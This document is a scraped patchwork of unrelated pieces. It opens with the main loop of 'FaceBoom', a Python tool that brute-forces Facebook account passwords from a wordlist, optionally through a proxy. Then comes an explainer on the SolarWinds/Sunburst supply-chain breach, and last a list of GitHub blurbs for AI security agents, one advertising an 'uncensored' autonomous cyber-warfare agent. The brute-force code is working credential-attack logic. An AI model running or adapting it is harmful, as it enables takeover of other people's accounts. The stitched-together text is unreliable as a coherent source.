target_profile = options.url update = options.update opts = [target,wordlist,single_passwd, proxy, target_profile, update] if any(opt for opt in opts): if not faceboom.cnet(): errMsg("Please Check Your Internet Connection") sys.exit(1) if update: faceboom.updateFaceBoom() sys.exit(1) elif target_profile: faceboom.get_profile_id(target_profile) sys.exit(1) elif wordlist or single_passwd: if wordlist: if not os.path.isfile(wordlist): errMsg("Please check Your Wordlist Path") sys.exit(1) if single_passwd: if len(single_passwd.strip()) < 6: errMsg("Invalid Password") print("[!] Password must be at least '6' characters long") sys.exit(1) if proxy: if proxy.count(".") != 3: errMsg("Invalid IPv4 ["+rd+str(proxy)+yl+"]") sys.exit(1) print(wi+"["+yl+"~"+wi+"] Connecting To "+wi+"Proxy[\033[1;33m {} \033[1;37m]...".format(proxy if not ":" in proxy else proxy.split(":")[0])) final_proxy = proxy+":8080" if not ":" in proxy else proxy if faceboom.check_proxy(final_proxy): faceboom.useProxy = final_proxy faceboom.br.set_proxies({'https':faceboom.useProxy, 'http':faceboom.useProxy}) print(wi+"["+gr+"Connected"+wi+"]") else: errMsg("Connection Failed") errMsg("Unable to connect to Proxy["+rd+str(proxy)+yl+"]") sys.exit(1) faceboom.banner(target,wordlist,single_passwd) loop = 1 if not single_passwd else "~" if single_passwd: passwords = [single_passwd] else: with open(wordlist, 'r', errors='replace') as f: passwords = f.readlines() for passwd in passwords: passwd = passwd.strip() if len(passwd) <6:continue write(wi+"["+yl+str(loop)+wi+"] Trying Password[ {"+yl+str(passwd)+wi+"} ]") retCode = faceboom.login(target, passwd) if retCode: sys.stdout.write(wi+" ==> Login"+gr+" Success\n") print(wi+"========================="+"="*len(passwd)+"======") print(wi+"["+gr+"+"+wi+"] Password [ "+gr+passwd+wi+" ]"+gr+" Is Correct :)") print(wi+"========================="+"="*len(passwd)+"======") if retCode == 2:print(wi+"["+yl+"!"+wi+"]"+yl+" Warning: This account use ("+rd+"2F Authentication"+yl+"):"+rd+" It's Locked"+yl+" !!!") break else: sys.stdout.write(yl+" ==> Login"+rd+" Failed\n") loop = loop + 1 if not single_passwd else "~" else: if single_passwd: print(yl+"\n["+rd+"!"+yl+"] Sorry: "+wi+"The Password[ "+yl+passwd+wi+" ] Is Not Correct"+rd+":("+yl+"!"+wi) print(gr+"["+yl+"!"+gr+"]"+yl+" Please Try Another password or Wordlist "+gr+":)"+wi) else: print(yl+"\n["+rd+"!"+yl+"] Sorry: "+wi+"I Can't Find The Correct Password In [ "+yl+wordlist+wi+" ] "+rd+":("+yl+"!"+wi) print(gr+"["+yl+"!"+gr+"]"+yl+" Please Try Another Wordlist. "+gr+":)"+wi) sys.exit(1) else: print(parse.usage) sys.exit(1) if __name__=='__main__': Main() ############################################################## ##################### ######################### ##################### END OF TOOL ######################### ##################### ######################### ############################################################## #This Tool by Oseid Aldary #Have a nice day :) #GoodBye
Mario-Kart-Felix
2020 was a roller coaster of major, world-shaking events. We all couldn't wait for the year to end. But just as 2020 was about to close, it pulled another fast one on us: the SolarWinds hack, one of the biggest cybersecurity breaches of the 21st century. The SolarWinds hack was a major event not because a single company was breached, but because it triggered a much larger supply chain incident that affected thousands of organizations, including the U.S. government. What is SolarWinds? SolarWinds is a major software company based in Tulsa, Okla., which provides system management tools for network and infrastructure monitoring, and other technical services to hundreds of thousands of organizations around the world. Among the company's products is an IT performance monitoring system called Orion. As an IT monitoring system, SolarWinds Orion has privileged access to IT systems to obtain log and system performance data. It is that privileged position and its wide deployment that made SolarWinds a lucrative and attractive target. What is the SolarWinds hack? The SolarWinds hack is the commonly used term to refer to the supply chain breach that involved the SolarWinds Orion system. In this hack, suspected nation-state hackers that have been identified as a group known as Nobelium by Microsoft -- and often simply referred to as the SolarWinds Hackers by other researchers -- gained access to the networks, systems and data of thousands of SolarWinds customers. The breadth of the hack is unprecedented and one of the largest, if not the largest, of its kind ever recorded. More than 30,000 public and private organizations -- including local, state and federal agencies -- use the Orion network management system to manage their IT resources. As a result, the hack compromised the data, networks and systems of thousands when SolarWinds inadvertently delivered the backdoor malware as an update to the Orion software. SolarWinds customers weren't the only ones affected. Because the hack exposed the inner workings of Orion users, the hackers could potentially gain access to the data and networks of their customers and partners as well -- enabling affected victims to grow exponentially from there. Orion Platform hack compromised networks of thousands of SolarWinds customers Hackers compromised a digitally signed SolarWinds Orion network monitoring component, opening a backdoor into the networks of thousands of SolarWinds government and enterprise customers. How did the SolarWinds hack happen? The hackers used a method known as a supply chain attack to insert malicious code into the Orion system. A supply chain attack works by targeting a third party with access to an organization's systems rather than trying to hack the networks directly. The third-party software, in this case the SolarWinds Orion Platform, creates a backdoor through which hackers can access and impersonate users and accounts of victim organizations. The malware could also access system files and blend in with legitimate SolarWinds activity without detection, even by antivirus software. SolarWinds was a perfect target for this kind of supply chain attack. Because their Orion software is used by many multinational companies and government agencies, all the hackers had to do was install the malicious code into a new batch of software distributed by SolarWinds as an update or patch. The SolarWinds hack timeline Here is a timeline of the SolarWinds hack: September 2019. Threat actors gain unauthorized access to SolarWinds network October 2019. Threat actors test initial code injection into Orion Feb. 20, 2020. Malicious code known as Sunburst injected into Orion March 26, 2020. SolarWinds unknowingly starts sending out Orion software updates with hacked code According to a U.S. Department of Homeland Security advisory, the affected versions of SolarWinds Orion are versions are 2019.4 through 2020.2.1 HF1. More than 18,000 SolarWinds customers installed the malicious updates, with the malware spreading undetected. Through this code, hackers accessed SolarWinds's customer information technology systems, which they could then use to install even more malware to spy on other companies and organizations. Who was affected? According to reports, the malware affected many companies and organizations. Even government departments such as Homeland Security, State, Commerce and Treasury were affected, as there was evidence that emails were missing from their systems. Private companies such as FireEye, Microsoft, Intel, Cisco and Deloitte also suffered from this attack. The breach was first detected by cybersecurity company FireEye. The company confirmed they had been infected with the malware when they saw the infection in customer systems. FireEye labeled the SolarWinds hack "UNC2452" and identified the backdoor used to gain access to its systems through SolarWinds as "Sunburst." Microsoft also confirmed that it found signs of the malware in its systems, as the breach was affecting its customers as well. Reports indicated Microsoft's own systems were being used to further the hacking attack, but Microsoft denied this claim to news agencies. Later, the company worked with FireEye and GoDaddy to block and isolate versions of Orion known to contain the malware to cut off hackers from customers' systems. They did so by turning the domain used by the backdoor malware used in Orion as part of the SolarWinds hack into a kill switch. The kill switch here served as a mechanism to prevent Sunburst from operating further. Nonetheless, even with the kill switch in place, the hack is still ongoing. Investigators have a lot of data to look through, as many companies using the Orion software aren't yet sure if they are free from the backdoor malware. It will take a long time before the full impact of the hack is known. Why did it take so long to detect the SolarWinds attack? With attackers having first gained access to the SolarWinds systems in September 2019 and the attack not being publicly discovered or reported until December 2020, attackers may well have had 14 or more months of unfettered access. The time it takes between when an attacker is able to gain access and the time an attack is actually discovered is often referred to as dwell time. According to a report released in January 2020 by security firm CrowdStrike, the average dwell time in 2019 was 95 days. Given that it took well over a year from the time the attackers first entered the SolarWinds network until the breach was discovered, the dwell time in the attack exceeded the average. The question of why it took so long to detect the SolarWinds attack has a lot to do with the sophistication of the Sunburst code and the hackers that executed the attack. "Analysis suggests that by managing the intrusion through multiple servers based in the United States and mimicking legitimate network traffic, the attackers were able to circumvent threat detection techniques employed by both SolarWinds, other private companies, and the federal government," SolarWinds said in its analysis of the attack. FireEye, which was the first firm to publicly report the attack, conducted its own analysis of the SolarWinds attack. In its report, FireEye described in detail the complex series of action that the attackers took to mask their tracks. Even before Sunburst attempts to connect out to its command-and-control server, the malware executes a number of checks to make sure no antimalware or forensic analysis tools are running. What was the purpose of the hack? The purpose of the hack remains largely unknown. Still, there are many reasons hackers would want to get into an organization's system, including having access to future product plans or employee and customer information held for ransom. It is also not yet clear what information, if any, hackers stole from government agencies. But the level of access appears to be deep and broad. There are speculations that many enterprises might be collateral damage, as the main focus of the attack was government agencies that make use of the SolarWinds IT management systems. Who was responsible for the hack? Federal investigators and cybersecurity agents believe a Russian espionage operation -- mostly likely Russia's Foreign Intelligence Service -- is behind the SolarWinds attack. The Russian government has denied any involvement in the attack, releasing a statement that said, "Malicious activities in the information space contradicts the principles of the Russian foreign policy, national interests and understanding of interstate relations." They also added that "Russia does not conduct offensive operations in the cyber domain." Contrary to experts in his administration, then-President Donald Trump hinted at around the time of the discovery of the SolarWinds hack that Chinese hackers might be behind the cybersecurity attack. However, he did not present any evidence to back up his claim. Shortly after his inauguration, President Joe Biden vowed that his administration intended to hold Russia accountable, through the launch of a full-scale intelligence assessment and review of the SolarWinds attack and those behind it. The president also created the position of deputy national security adviser for cybersecurity as part of the National Security Council. The role, held by veteran intelligence operative Anne Neuberger, is part of an overall bid by the Biden administration to refresh the federal government's approach to cybersecurity and better respond to nation-state actors. Naming the attack: What is Solorigate, Sunburst and Nobelium? The SolarWinds attack has a number of different names associated with it. While the attack is often referred to simply as the SolarWinds attack, that isn't the only name to know. Sunburst. This is the name of the actual malicious code injection that was planted by hackers into the SolarWinds Orion IT monitoring system code. Both SolarWinds and CrowdStrike generally refer to the attack as Sunburst. Solorigate. Microsoft initially dubbed the actual threat actor group behind the SolarWinds attack as Solorigate. It's a name that stuck and was adopted by other researchers as well as media. Nobelium. In March 2021, Microsoft decided that the primary designation for the threat actor behind the SolarWinds attack should actually be Nobelium -- the idea being that the group is active against multiple victims -- not just SolarWinds -- and uses more malware than just Sunburst. The China connection to the SolarWinds attack While it is suspected that the initial Sunburst code and the attack against SolarWinds and its users came from a threat actor based in Russia, other nation-state threat actors have also used SolarWinds in attacks. According to a Reuters report, suspected nation-state hackers based in China exploited SolarWinds during the same period of time the Sunburst attack occurred. The suspected China-based threat actors targeted the National Finance Center, which is a payroll agency within the U.S. Department of Agriculture. It is suspected that the China-based attackers did not use Sunburst, but rather a different malware that SolarWinds identifies as Supernova. Why is the SolarWinds hack important? The SolarWinds supply chain attack is a global hack, as threat actors turned the Orion software into a weapon gaining access to several government systems and thousands of private systems around the world. Due to the nature of the software -- and by extension the Sunburst malware -- having access to entire networks, many government and enterprise networks and systems face the risk of significant breaches. The hack could also be the catalyst for rapid, broad change in the cybersecurity industry. Many companies and government agencies are now in the process of devising new methods to react to these types of attacks before they happen. Governments and organizations are learning that it is not enough to build a firewall and hope it protects them. They have to actively seek out vulnerabilities in their systems, and either shore them up or turn them into traps against these types of attacks. Since the hack was discovered, SolarWinds has recommended customers update their existing Orion platform. The company has released patches for the malware and other potential vulnerabilities discovered since the initial Orion attack. SolarWinds also recommended customers not able to update Orion isolate SolarWinds servers and/or change passwords for accounts that have access to those servers. The greater White House cybersecurity focus will be crucial, some industry experts have said. But organizations should consider adopting modern software-as-a-service tools for monitoring and collaboration. While the cybersecurity industry has significantly advanced in the last decade, these kinds of attacks show that there is still a long way to go to get really secure systems. The Nobelium group continues to attack targets The suspected threat actor group behind the SolarWinds attack has remained active in 2021 and hasn't stopped at just targeting SolarWinds. On May 27, 2021, Microsoft reported that Nobelium, the group allegedly behind the SolarWinds attack, infiltrated software from email marketing service Constant Contact. According to Microsoft, Nobelium targeted approximately 3,000 email accounts at more than 150 different organizations. The initial attack vector appears to be an account used by USAID. From that initial foothold, Nobelium was able to send out phishing emails in an attempt to get victims to click on a link that would deploy a backdoor Trojan designed to steal user information.
Dave-gilmore-aus
An Ai agent that takes a simple prompt, then uses a series of agents to conduct research and and can produce blog posts, linkedin posts or technical guides using a friendly web UI
Killer-Anya
“赛博龙虾皇帝”是一个极简风格的实时可视化仪表板,专为 OpenClaw 多 Agent 系统设计,灵感来源于 Edict 项目将古代中国“三省六部制”应用于 AI 协作。“Cyber Lobster Emperor” is a minimalist real-time visualization dashboard specifically designed for the OpenClaw multi-agent system. Reference Project:Edict: 三省六部制 · OpenClaw Multi-Agent Orchestration System. https://github.com/cft0808/edict
vitalii-honchar
Cyber Secyrity AI Agent PoC
bvcyber
AI agent for autonomous cyber operations
capture0x
AI-powered cyber security scanner for red team operations and bug bounty hunting
waybarrios
AI-powered penetration testing with Claude Code agents. RedTeam Barranquilla - Automating security assessments using PTES methodology.
IlyaOrson
An Attentive Graph Agent for Topology-Adaptive Cyber Defence
isaacsight
kbot — the AI agent that dreams, learns, and evolves. 764+ tools, 35 agents, 20 providers. Music production, iPhone control, financial analysis, cyber threat intel. Always-on daemon. Runs offline. npm i -g @kernel.chat/kbot
anjanl0g
SherKhan-Black-AI: An advanced, air-gapped autonomous cyber warfare agent. Powered by a hybrid Dual-Core LLM engine (Uncensored), it orchestrates full-spectrum Red, Blue, and Black team operations with real-time execution of native Kali Linux tools.
radanliev
Red Teaming Multi-Agent AI Systems - Learn how to simulate, test, and defend against coordinated cyber-attacks on autonomous agent networks.
Abhijeet1990
This repository is an Reinforcement Learning Platform for learning agents to control cyber-physical Power Distribution Systems resiliently. The cyber environment in based on SimPy Discrete Event Simulator, while the distribution system is backened by Open-DSS.